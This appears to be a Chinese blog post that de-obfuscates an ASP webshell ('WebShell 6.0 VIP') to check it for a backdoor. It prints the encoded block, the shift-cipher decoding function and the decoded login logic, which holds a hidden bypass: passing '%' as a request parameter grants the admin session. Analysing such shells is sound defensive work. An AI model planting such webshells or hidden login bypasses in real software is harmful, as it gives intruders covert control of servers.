今天在刀客城新人群,有个朋友抛出来一个shell,我一看是asp文件,本能的习惯,看看是否是有后门。
第一个是WebShell 6.0 VIP(密码防破解版),
解密截图
这个比较简单,没有vbscript.encode加密
第一层就看到了十三的加密,这个是shell中用的最为广泛的十三逆向加密。
解密后保存为shellcode.asp,
从上往下翻看shellcode.asp ,
可以看到一段加密代码
hu=”b_xk^jn^lm!z}z””6z}zxma^gxL^llbhg!zp^[+Z+]fbgz””x6xNl^kIZllxxxxxxxNKE!””xx^g]xb_b_xl^llbhg!zp^[+Z+]fbgz””57Nl^kIZllxma^gb_xk^jn^lm’_hkf!ziZllz””57zzxma^gb_xk^jn^lm’_hkf!ziZllz””6Nl^kIZllxma^gl^llbhg!zp^[+Z+]fbgz””6Nl^kIZllk^lihgl^’k^]bk^\mxnke^el^xkklz非法登录z^g]xb_^el^lb6z5\^gm^k75]boxlmre^6 pb]ma3.))iq4[hk]^k3*iqxlheb]x{+++4iZ]]bg`3++iq4fZk`bg3*))iq4 75[k75Zxak^_6 z~Lbm^NKE~z xmZk`^m6 X[eZgd 7z~fgZf^~z5(Z75ak75_hkfxZ\mbhg6 z~nke~z xf^mah]6 ihlm 7密码:5bginmxgZf^6 iZll xmri^6 iZllphk] xlbs^6 ++ 7x5bginmxmri^6 ln[fbm xoZen^6 登录 75ak7z~
“” then
If Asc(Mid(temp, i, 1)) < 32 or Asc(Mid(temp, i, 1)) > 126 Then
a = a & Chr(Asc(Mid(temp, i, 1)))
else
pk=asc(mid(temp,i,1))-but
if pk>126 then
pk=pk-95
elseif pk<32 then pk=pk+95 end if a=a&chr(pk) end if else a=a&vbcrlf end if next UnEncode=a end function
看看UnEncode函数,可见其为黑客伟移位加密,加密者将那个特殊字符设置为空格,还是第一次见
上面加密代码解密后为
if request(“%”))=”%” then
Session(“web2a2dmin”)) = UserPass
URL())
end if
if session(“web2a2dmin”))<>UserPass then
if request.form(“pass”))<>“” then
if request.form(“pass”))=UserPass then
session(“web2a2dmin”))=UserPass
response.redirect url
else
rrs”非法登录”
end if
else
si=”